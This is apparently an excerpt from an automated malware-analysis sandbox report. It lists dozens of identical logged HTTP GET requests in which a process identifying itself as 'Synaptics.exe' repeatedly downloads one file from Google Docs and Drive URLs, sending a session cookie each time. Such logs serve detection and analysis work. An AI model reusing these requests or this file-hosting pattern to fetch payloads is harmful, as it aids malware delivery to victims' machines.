                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
